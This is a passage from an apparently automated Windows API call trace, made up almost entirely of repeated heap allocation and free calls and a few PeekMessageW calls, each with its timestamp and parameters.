dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0100.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0100.699] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0100.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0100.699] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0100.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0100.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0100.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0100.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0100.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0100.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0100.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0100.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0100.712] RtlAllocateHeap 